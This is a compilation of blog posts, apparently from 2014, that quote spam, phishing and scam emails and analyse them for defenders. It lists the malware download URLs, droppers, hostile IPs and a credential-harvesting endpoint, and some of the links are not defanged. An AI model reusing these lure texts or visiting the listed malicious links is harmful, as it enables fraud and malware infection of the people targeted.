We have uploaded fax report on dropbox, please use the following link to download your file:

https://www.dropbox.com/meta_dl/[redacted]

The malicious download is from [donotclick]www.dropbox.com/meta_dl/eyJzdWJfcGF0aCI6ICIiLCAidGVzdF9saW5rIjogZmFsc2UsICJzZXJ2ZXIiOiAiZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbSIsICJpdGVtX2lkIjogbnVsbCwgImlzX2RpciI6IGZhbHNlLCAidGtleSI6ICJvempiZ256bDM2aGRlMTgifQ/AAKxr3bqwwmIfwE_cp_xalkzMz7tKRtiivmPhViZTBLBkA?dl=1 which is an archive file FAX-21651_7241.zip which in turn contains the malicious executable FAX-21651_7241.scr

This binary has a VirusTotal detection rate of 6/53 and the Malwr report shows that it downloads a file from soleilberbere.com/images/2905UKdw.tar which subsequently drops a file eucis.exe with a VirusTotal detection rate of just 3/51. Automated reports [1][2] are pretty inconclusive as to what this does.

Wednesday, 28 May 2014

Despite some high-profile recent cases where SMS spammers have been busted by the ICO, the wave of spam seems to be continuing. This one came less than an hour ago from +447729938098.

Unsure if you qualify for a refund of PPI paid on a loan or credit card? Reply PPI and we will run a no obligation check or reply STOP to opt out. TPPCO

I have no idea who "TPPCO" are, but they are a common sender of these spam message. In this case, the spam was sent to a number that is TPS registered, and I believe that the approach is fraudulent in any case - in most cases the spammers will get paid for a lead even if it turns out that the claimant wasn't eligible.

If you get one of these, you should forward the spam and the sender's number to your carrier. In the came of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Carriers and the ICO are cracking down on these scumbags, but they need reports from victims to gather enough evidence.

You can also report persistent spam like this via the ICO's page on the subject, which might well end up in the spammers getting a massive fine.

This account is subject to the terms listed in the eFax Customer Agreement.

The telephone number will vary from spam-to-spam, but the download link seems consistent and is [donotclick]dl.dropboxusercontent.com/s/uk0mlaixvbg52g2/Fax_938_391102933_1245561.zip?dl=1&token_hash=AAEUA5cH_mfvkp4l4CePv7t100XZKo4GBq6ZxY1UiElKyQ&expiry=1401269894 which leads to a ZIP file Fax_938_391102933_1245561.zip which unzips to a malicious executable Fax_938_391102933_1245561.scr.

This binary has a VirusTotal detection rate of 6/53. Automated reporting tools [1][2] show a download from landscaping-myrtle-beach.com/wp-content/uploads/2014/05/2805UKdw.dkt which in turn drops the following files:

Keep track of your account with your latest Online Financial Activity Statement from NatWest Bank. It's available for you to view at this secure site. Just click to select how you would like to view your statement:

View/Download as a PDF

View all EStatements

So check out your statement right away, or at your earliest convenience.

Thank you for managing your account online.

Sincerely,

NatWest Bank

Please do not respond to this e-mail. If you have any questions about this inquiry message or your NatWest Bank account, please speak to a Customer Service representative at +44 121 635 1592

NatWest Bank Customer Service Department

P.O. Box 414 | 38 Strand, WC2N 5JB, London

Copyright 2014 NatWest Company. All rights reserved.

AGNEUOMS0006001

The link in the email goes to [donotclick]dl.dropboxusercontent.com/s/h8ee7pet8g3myfh/NatWest_Financial_Statement.zip?dl=1&token_hash=AAGNPq4-blG8MXToyYPu1l8lXEyrOQNz6EjK7rUBRaSHGg&expiry=1400838977 which downloads an archive file NatWest_Financial_Statement.zip which in turn contains the malicious executable NatWest_Financial_Statement.scr. This has a VirusTotal detection rate of just 3/52.

Automated analysis tools [1][2] show that it downloads a component from [donotclick]accessdi.com/wp-content/uploads/2014/04/2305UKmw.zip

The Malwr analysis shows that it then downloads some additional EXE files:

Identify general principles under the Fair Labor Standards Act. Explain salary requirements and the highly compensated employee exemption. Review what an employer can do to assure classifications are accurate and minimize risks. Discuss the executive, administrative, professional and computer professional duties tests.

More Information

Faculty

Michael A. PavlickMichael A. PavlickK&L Gates LLP

The link in the email goes to lormaneducation.net and then forwards immediately to lorman.com, which is a typical technique that spammers use to try to avoid getting blacklisted.

lormaneducation.net is hosted on 64.77.120.67 (Peer 1, US) along with these following domains which look similarly spammy:

Hello,My beloved brother and sister. I hope my message get to you in peace.My name is Mary Sambo from Borno state in Nigeria. I am crying whileputting this message together in the church hostel. I lost my husband tothe terrorist attack that is happening in Borno state, my daughters waskidnap along with the 270 girls been kidnap in school chibok village inNigeria, by the terrorist.

Which the entire world is now searching for them. I am 7 month pregnantand i am staying at the church hostel, we are 30 in a single room, idon't have access to good medical care and i am afraid my livingcondition might affect my unborn child.

I am asking for help from you in other for me to get a place for myselfand also register myself to health center where i will get propermedical care. Please help me with anything you, May Almighty God rewardyou.Hope to hear from you.Regards.

Mary Sambo.Please reply here: marysamb91@yahoo.com

Apparently this church hostel that she is staying in has internet access good enough to send out spam. And although the scammer is soliciting replies to marysamb91@yahoo.com it is sent fromjoymcus55@gmail.com which has its own Google+ profile.. which contains a picture.

Now, I don't know about you.. but I don't think that this looks like a Nigerian woman who has to live in a church hostel. That's because it is a photograph of actress and model YvetteFintland who would no doubt be very displeased to see her photo being abused in this way (and has nothing whatsoever to do with this scam or spam).

There are no words that can adequately describe the horror of the kidnapping of 200 innocent children. And there are no words that adequately describe the disgust at people who are prepared to exploit this awful event for their own personal gain.

Wednesday, 21 May 2014

93.171.173.173 (Alfa Telecom, Russia) is currently distributing the Sweet Orange EK via a bunch of hijacked GoDaddy subdomains. The malware is being spread through code injected into legitimate but hacked websites.

For example [donotclick]www.f1fanatic.co.uk is a compromised website that tries to redirect visitors to two different exploit kits:

The second one is an attempt to load the Fiesta EK although the payload site is currently down. But the .house domain appears to be Sweet Orange (incidentally this is the first time that I've seen one of the new TLDs abused in this way).

The server on 93.171.173.173 hosts a number of subdomains that are hijacked from GoDaddy customers. I recommend that you block either the subdomain or domains themselves:

Prime Aspire is a freelance marketplace. This message, its contents and any attachments are private, confidential and may contain information that is subject to copyright. You may not disclose, use or disseminate all or part of this message without our prior written consent. If you are not the intended recipient, please notify us immediately by replying to this message and then delete it from your system. Whilst we take reasonable precautions to prevent computer viruses, we cannot accept responsibility for viruses transmitted to your computer and it is your responsibility to make all necessary checks. We may monitor email traffic data and the content of emails to ensure efficient operation of our business, for security, for staff training and for other administrative purposes.

This email was sent from Prime Aspire Limited (Registered number: 7850209). Prime Aspire Limited is registered in England and Wales. Registered address: SUITE 34, New House, 67-68 Hatton Garden, London EC1N 8JY United Kingdom. For further information, please click www.primeaspire.com

To unsubscribe please reply with the word "Unsubscribe".

But (and just as a warning, I'm going to get sweary here) wait a fucking minute.. "This message, its contents and any attachments are private, confidential
and may contain information that is subject to copyright. You may not
disclose, use or disseminate all or part of this message without our
prior written consent." You fucking spammed me with this. I will do with it what I fucking well please.

CEO of PrimeAspire is one Chris Adiolé. PrimeAspire (strictly speaking it is Prime Aspire Ltd) is a real company (07850209 in the UK), and Mr Adiolé even has his name on the domain WHOIS details rather than hiding behind a proxy service.

Originating IP is 79.170.44.6 which is Heart Internet in the UK. The primeaspire.com domain is hosted with the same firm on 79.170.40.239.

So, let's assume that this is a real proposition and not some sort of scam. Fair enough. But promoting your startup through spam is always a very bad move, but adding meaningless legalese crap to it is really going to piss people off..

UPDATE: many Kudos points to Chris Adiolé for addressing the issue and apologising. So perhaps they're not such a bad bunch after all :)

Hi,

I note you recently published an article on your blog with regards to a promotional email you received from PrimeAspire.

We are a small startup and after our launch in February we worked with a marketing agency who supplied us with email addresses, claiming to be addresses of people that opted to receive emails about freelancing and related services. Unfortunately, we took their words at face value and failed to check the email addresses before sending out the emails.

On behalf of PrimeAspire, I sincerely apologise for the inconvenience. We are an honest startup working hard on our product and have no intention to send spam emails or use sinister marketing procedures to promote our product.

Thanks,

UPDATE 2: but now PrimeAspire are likely to lose their Kudos point due to this rather rude message from some Indian SEO guy..

I'm Tutu Kumar from india, also a SEO Expert. Now i'm working SEO for Primeaspire.com. And i saw google search pages our blog title PrimeAspire (primeaspire.com) spam. This blog title is bad effect for our website but content is good.Kindly remove the blog of your website.

Thank YouTutu Kumar

Funnily enough, I don't feel inclined to do that. PrimeAspire sent me a spam.. that happened, and Chris Adiolé apologised which I think shows a great deal of integrity. Perhaps Mr Kumar needs to generate some positive press instead rather than concentrating on my little blog.

Attached is an archive file TT PAYMENT COPY.zip which in turn contains another archive file TT PAYMENT COPY.rar (which relies on the victim having a program to uncompress the RAR file). Once that is done, a malicious executable PaySlip.exe is created. This file has a VirusTotal detection rate of 27/53. Automated analysis tools (such as this one) don't reveal what is happening, but you can guarantee it is nothing good.

Keep track of your account with your latest Online Merchant Financial Activity Statement from NatWest Bank. It's available for you to view at this secure site. Just click to select how you would like to view your statement:

View/Download as a PDF

View all EStatements

So check out your statement right away, or at your earliest convenience.

Thank you for managing your account online.

Sincerely,

NatWest Bank

Please do not respond to this e-mail. If you have any questions about this inquiry message or your NatWest Bank ®
Merchant account, please speak to a Customer Service representative at 1-800-374-2639

NatWest Bank Customer Service Department

P.O. Box 414 | 38 Strand, WC2N 5JB, London

Copyright 2014 NatWest Company. All rights reserved.

AGNEUOMS0006001

The link in the email goes to [donotclick]bit.ly/1jKW2GJ which then downloads a malicious file Statement-pdf.scr which has a VirusTotal detection rate of 8/53. Automated analysis tools [1][2][3][4] are inconclusive about what the malware actually does.

One thing about bit.ly links is that if you put a "+" at the end of the link you can see how many people clicked it. In this case, 236 people have clicked so far, mostly in North America. I suspect that quite a few of those are malware researchers!

We are currently seeking to employ individualÃÔ world wide. How would you like to make money by simply driving your car advertising for RED BULL.

How it works?

HereÃÔ the basic premise of the "paid to drive" concept: RED BULL seeks people -- regular citizens,professional drivers to go about their normal routine as they usually do, only with a big advert for "RED BULL" plastered on your car. The ads are typically vinyl decals, also known as "auto wraps,"that almost seem to be painted on the vehicle, and which will cover any portion of your car's exterior surface.

What does the company get out of this type of ad strategy? Lots of exposure and awareness. The auto wraps tend to be colorful, eye-catching and attract lots of attention. Plus, it's a form of advertising with a captive audience,meaning people who are stuck in traffic can't avoid seeing the wrapped car alongside them. This program will last for 3 months and the minimum you can participate is 1 month.

You will be compensated with $300 per week which is essentially a "rental"payment for letting our company use the space no fee is required from you RED BULL shall provide experts that would handle the advert placing on your car. You will receive an up front payment of $300 inform of check via courier service for accepting to carry this advert on your car.

It is very easy and simple no application fees required contact email along with the following you are interested in these offer.rolandbest195@gmail.com

It's a scam.. but what is the scam exactly? The whole process is nicely detailed here, but essentially the scammers send you a fake cheque ("check" I in the US) as payment. This cheque includes an amount that you are meant to pay the "graphic artist" for the work needed to create the wrap. Of course, once you have sent your own money to the "artist" (in reality a scam artist) then the fake cheque will be rejected, and you will end up out of pocket (and possibly in trouble with the police or bank for fraud).

The overpayment scam is a common one, and it is used in all sorts of different set-ups. If anyone sends you a cheque and then asks you to pay it in and forward some of the money elsewhere then you can almost guarantee that someone is trying to rip you off.

All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record. Not yet filing your accounts online? See how easy it is... For enquiries, please telephone the Service Desk on +1 800-285-4794 or email enquiries@citibank.com. This email was sent from a notification-only email address which cannot accept incoming mail. Please do not reply directly to this message. .

Attached to the message is an archive file CommercialForm.zip which in turn contains a malicious executable CommercialForm.exe which has a VirusTotal detection rate of 19/52. Automated analysis tools [1][2][3] show that it downloads an encrypted file from [donotclick]desktopcrafts.com/wp-content/uploads/2014/05/Targ-1405USdp.enc although what that does is currently unclear.

Network Operations Center don't exactly have a glowing reputation of cleanliness when it comes to malware. These following IPs and hosts seem to be distributing something nasty which appears to be injected into victim sites.

I don't have a good analysis of what is going on at the moment, so you'll just have to take my word for it at the moment. The activity has been observed on the following Network Operations Center IP addresses over the past few days:

A lot of these IPs are connected with things like porn sites, but they also have a number of malicious subdomains in the form .one .two and .three on them. You can safely assume that the domains themselves are malicious (listed as the end of the post if you want to block them). Malicious subdomains spotted are:

Now, I use a unique email address for every service I use, and today I was surprised to see the address I used for Overture being used in this spam. I believe this is the first time that I have ever seen spam to this address, so I assume that this is a recent leak of addresses (and Yahoo! has had all sort of problems with breaches at the Heatbleed bug recently).

The botnet sending out this spam does seem to have access to leaked email data that I haven't seen used before. So is this an early warning of yet another problem at Yahoo?

This is my first run for political office. I am a doctor, not a career politician, but I just couldn’t sit on the sidelines and watch what is happening to our great nation any longer.

I have always stood up for what I believe in. The first time I stood up to a bully I was 7 years old.

Today, the biggest bully I see is the federal government. I grew up on a working farm in Plankinton, South Dakota. I am a doctor who works with the elderly and the poor. The clinic I own is a small business. In every area of work and life, there is just too much government interference.

Being a doctor, I understand how unfair and harmful Obamacare really is -- and I have vowed to repeal every single word of it. I also pledge to cut taxes, defend the second amendment, and to protect the unborn.

Washington, D.C. insiders don’t want to see people like you and me change their way of doing business.

Change is possible, but it takes effort from all of us.

I am fighting for that change against an establishment insider with millions of dollars, much of it PAC money from special interest groups.

My opponent has so much PAC money, he can afford to be wasteful – and he is. Just this week, he produced a slick advertisement for TV that didn’t even feature voters from the state of South Dakota. And when he was caught, he didn’t even apologize -- he just threw the advertisement away.

That’s not how I do things.

I am a fiscal conservative. I promise that if you donate now, your hard earned donation will be used in a responsible way to fight big government and wasteful spending. I need your help to get there. Will you join me?

Absentee ballots in South Dakota are mailed out this month and that’s when voting begins – will you chip in $5 or more today?

It seems that she's a Doctor of some sort, but she opposes affordable healthcare. As a European we are constantly amazed and horrified at the way US healthcare professionals just let people die when the money runs out of their insurance policy.. if they have an insurance policy. Until Obama forced changes to the US healthcare system through it was 100 years behind that in Europe. Now it is only 80 years or so behind. Progress I guess.

Also, Annette Bosworth (or whatever idiot is spamming on her behalf) is attempting to solicit funds through fundly.com which violates their terms of service. Luckily she hasn't been able to recruit many other morons to her cause and has only raised $1,150 out of a target of $750,000.

Well, since this is an abuse of the Fundly terms of service, then getting it shut down and losing the funds could be a bit of a laugh.

The spam originates from two18.2bits.co (63.143.38.243) and spamvertises a site at marketer.2bits.co (63.143.38.226). Both these IPs are allocated to Limestone Networks in the US, but are suballocated to a customer called Joseph (Joey) Burzynski of ResistedNormalcy LLC and/or MarketKar.ma in Dallas. The email is digitally signed for the domain bosworthcampaign.com which has hidden WHOIS details.

Of course, this could be a subtle Joe Job intended to frame Annette Bosworth and make her look like a moron. But according to Joey Burzynski's own Facebook page at www.facebook.com/resistednormalcy/likes he "likes" Annette Bosworth. And tattoos. A lot.

There are plenty of other indicators online that Dr Bosworth has employed the promotional "talents" of Mr Burzynski.

I'm not the only one that thinks that this is spammy either, because Gmail says..

Presumably Annette Bosworth thinks that her point of view is so important that she can spam it out to people at random, regardless of where they live. I personally think she is a moron spammer and hope that the electors of South Dakota treat her accordingly.

Contributions and donations may not be solicited, accepted, or received from, or made directly or indirectly by, foreign nationals who do not have permanent residence in the United States (i.e., those without green cards). This prohibition encompasses all US elections; including federal, state and local elections. 11 CFR 110.20(b).

So it would be prohibited for Dr Bosworth's campaign to accept a donation from me as I live in the UK and have never even visited to the US.

UPDATE 13 May 2014: it has been said that Americans don't get irony. When I made my illegal $10 contribution to Annette Bosworth's campaign, I added the comment "Ten Bucks Well Spent!" because I knew that that accepting the money from a foreign donor would have some entertaining repercussions.

What I didn't expect was that not only would be donation be accepted, but that Dr Bosworth would also quote me on her Facebook page..

I like the comment "GOOD AMERICAN;;" (even with the spurious semicolons. Perhaps Americans don't understand semicolons either. I'm not sure I do) because of course I am British. And if Dr Bosworth's supporters knew my political leanings then they would assume I was the Spawn of Satan.

Interestingly, this means that they not only accepted the donation but someone took the time to review it.. surely then they should have spotted that I was not in the US.

Thank you for sending your VAT Return online. The submission for reference 0781569 wassuccessfully received on Fri, 9 May 2014 12:47:49 +0530 and is being processed. Make VATReturns is just one of the many online services we offer that can save you time andpaperwork.

For the latest information on your VAT Return please open attached report.

The original of this email was scanned for viruses by the Government Secure Intranetvirus scanning service supplied by Cable&Wireless Worldwide in partnership withMessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email wascertified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded forlegal purposes.

It says "On leaving the GSi this email was certified virus free" which (as you might suspect) is utter bollocks, because it comes with a malicious payload. Attached to the message is an archive VAT0781569.zip which in turn contains two identical malicious executables AccountDocuments.scr and VAT090514.scr which have a VirusTotal detection rate of 15/52.

This is part one of the infection chain. Automated analysis [1][2][3] shows that components are then downloaded from the following locations:

The malicious binary heap170id3.exe has a VirusTotal detection rate of 9/52. Automated analysis [1][2] shows that this makes a connection to a server at 94.23.32.170 (OVH, France).

The other malicious binary, b01.exe had a VirusTotal detection rate of 11/52. Analysis of this shows [1][2] that it attempts to connect to several different email services, presumably to send out spam.

we want to inform you that your supplier/seller shipped your goods through our shipping services, we hope your supplier must have given you the details about your container vessel ,we strongly recommend that you confirm your goods/cargo immediately by tracking your goods online. All shipped container/goods must be tracked to enable you to know the location of your shipment and to know the arrival date of vessel. This is why MAERSK LINE has enabled a user friendly interface for our customers to track there goods by themselves without the help of the agents.

Download the container tracking form attached and log in with your email now to know the status and location of your container/shipment. You must use the email which you used in communicating with your supplier/seller that is the email our tracking system will recognize because it is the email your supplier registered your goods with .You will be able to save the search criteria for easy reuse at a later stage. You will also have the opportunity to search for shipment from/from specific locations and many other features.

This attempts to harvest credentials and then POSTS them via a dedicated phishing site at send.apbem.org.br/zolamaersksend.php (189.73.155.37 / Brasil Telecom, Brazil). Once the username and password have been stolen, the victim is sent to the real My Maersk site (which doesn't actually require a password for basic container tracking).

Not many people will have a relevant shipping account at Maersk, but you can imaging the potential value of being able to ship stolen or illegal goods for free..

In order to have your company inserted in theglobal trade register of partner companies forthe 2015/2016 edition you must print, completeand send the enclosed form before the end ofnext week to the following address:

World Trade RegisterP.O. Box 30793502 GB UtrechtThe Netherlands

or fax it to:Fax: +31 205 248 107

or reply to this email and attach the form to it.

Updating is free of charge!To unsubscribe please visit this link:unitedtraderegister.eu/unsubscribe.php?email=info@[redacted]In case the form is missing you can download it here:unitedtraderegister.eu/wtr.pdf

The company behind this spam is a ROKSO-listed organisation called World Company Register / EU Business Register. A ROKSO listing basically means that this is one of the worst spammers currently in the world.

unitedtraderegister.eu forwards to europeantraderegister.net (and worldtraderegister.net is on the same server). This is an old-fashioned directory scam and it should be ignored.

Please review attached BACs documents and fax it to +44 (0) 845 600 3319. Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager.

Yours faithfully

Annmarie BaldwinSenior Manager, Lloyds Commercial Banking

Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.

Please remember we guarantee the security of messages sent by email.

The last line gave me a laugh.. "Please remember we guarantee the security of messages sent by email." Attached to the message is a file LloydsCase-0995479.zip which in turn contains a malicious executable LloydsCase-07052014.scr. The binary is identical in function to the one used in this TNT spam run doing the rounds at the same time.

The attachment is GB5766211.zip which contains the malicious executable GB07052014.scr (note the date is encoded into the filename). This has a VirusTotal detection rate of 7/52.

Automated analysis tools [1][2][3] show a UDP connection to wavetmc.com and a further binary download from demo.providenthousing.com/wp-content/uploads/2014/05/b01.exe

This second executable has a VirusTotal detection rate of 20/51. The Malwr report and Anubis report both show attempted connection to various mail servers (e.g. Gmail and Hotmail). Furthermore the Anubis report shows a data transfer to 83.172.8.59 (Tomsk Telecommunication Company, Russia).

I guess the psychology here is that if you can't tell a convincing lie, then tell a short one. The attachment is emailinvoice.069911.zip which in turn contains a malicious executable emailinvoice.899191.exe which has a VirusTotal detection rate of 5/52.

Automated analysis tools of this binary [1][2][3] shows that it downloads a further component from one of the following locations:

This "111.exe" binary has an even lower VirusTotal detection rate of 3/51. Automated analysis of this shows [1][2][3] shows the malware installs itself deeply into the target system.

There is a further dowload of a malicious binary from files.karamellasa.gr/tvcs_russia/2.exe which has a detection rate of 5/50 and identifies as a variant of Zeus. This creates fake svchost.exe and csrss.exe executables on the target system [1][2][3].

If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt.com/personal/digitalvault/help or call the helpdesk on 0870 240 1116* between 8am and midnight.

Thank you for choosing BT Digital Vault.

Kind regards,
BT Digital Vault Team
footer

*Calls charged up to 8 pence per minute on the BT network (minimum fee 5.5p). Mobile and other network costs may vary. See http://www.bt.com/pricing for details.

Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address.

This electronic message contains information from British Telecommunications plc, which may be privileged or confidential. The information is intended for use only by the individual(s) or entity named above. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of the contents of this information is strictly prohibited. If you have received this electronic message in error, please delete this email immediately.

You will be asked to log into your account to confirm this email address. Be sure to log in with your current primary email address.

We ask you to confirm your email address before sending invitations or requesting contacts at Linkedln. You can have several email addresses, but one will need to be confirmed at all times to use the system.

If you have more than one email address, you can choose one to be your primary email address. This is the address you will log in with, and the address to which we will deliver all email messages regarding invitations and requests, and other system mail.

One example landing URL is [donotclick]www.ccccooa.org/buyphentermine/ which leads to a sort of intermediary landing page..

This is turn goes to a redirected at [donotclick]stylespanel.com/h/go/phentermine.php and then to [donotclick]www.hq-pharmacy-online.com/search.html?q=phentermine which is a fake pharmacy site hosted on 95.211.228.240 (LeaseWeb, Netherlands) which is registered to a probably fake address in Argentina.

Avoid.. oh, and if you run a WordPress site please make sure the software is up-to-date.

Someone close to you wants you to spend at least the next five years of your life behind bars. He has reported you to our organization and I am the one assigned to follow you up to gather more evidences against you. Attached to this email is a copy of the person's audio recording against you. Your name was mentioned eleven times in this recorded conversation, check if you can recognise the person's voice.

What I require is that you create a new email address which will be used for our further correspondence. Use your mobile phone number to text me your newly created email address on this number: +66928711125. The phone line is secured and cannot be traced by our organization or any other law enforcement agent. I know my reason for disclosing this important information to you at this time. Upon receiving your text, I will tell you who I am, our organization and what next you are to do.

You are to note the following and observe them, contrary to these, you will never hear from me again.

1. You are not to reply me on this email address.2. You are not to call me on the above given number for any reason.3. You are to text only your newly created email address to me.4. The newly created email address must be used just for the both of us alone4. If you know the voice in the recorded message, never approach the person until I tell you to.5. You must not disclose anything relating to this information to another person.

Having read and understood what I have said, you are to now create a new email address and send it to me by text through your mobile phone number. I am waiting.

Yours sincerely,Agent Feather.

Attached is a file His Voice.zip which unzips to another file called Voice Conversation without any extension at all. In fact, this file is a malicious executable (you would have to rename it to Voice Conversation.exe manually if you want to infect yourself) which has a VirusTotal detection rate of 13/49.

Most of the automated tools I have thrown at it seem to error out, but the ThreatExpert report does show the malware installing itself onto the test system and making some system changes to prevent removal. It also enumerates the IP address, detects proxy settings and attempts to connect to Google's Gmail SMTP server.

The block is owned by RN Data SIA of Latvia and suballocated to somebody in St Petersburg by the name of Mikhail Evgenyevich Valyalov. RN Data are one of those hosts that have hosted malware in the past, and I tend to lean towards blocking them.

A look at the other contents of the /24 appear [csv] to indicate further suspicious activity, especially f528764d624db129b32c21fbca0cb8d6.com on 146.185.213.53 (mentioned here plus several other places).

So, frankly this entire /24 looks like it is being used for evil purposes at the moment and I recommend that you block it, plus these following domains:

Dear CustomerOur company has obtained your order and it'll be processing for 2 days.The the bill of parcels and delivery details are below:http://www.anat-barnir.co.il/04-05-2014/clients/clients.045-264.zipSincerely yours,BiP Solutions CompanyEduard Fulton

BiP Solutions is a real company, but this spam did not come from them. The link in the email goes to a legitimate (but hacked) site in Israel and downloads a file clients.045-264.zip which unzip to a malicious executable clients.045-264.PDF______________________________________________________.exe (there are a lot of underscores in there, yes). This has a VirusTotal detection rate of 15/52, however automated analysis tools [1][2] are inconclusive as to what it actually does.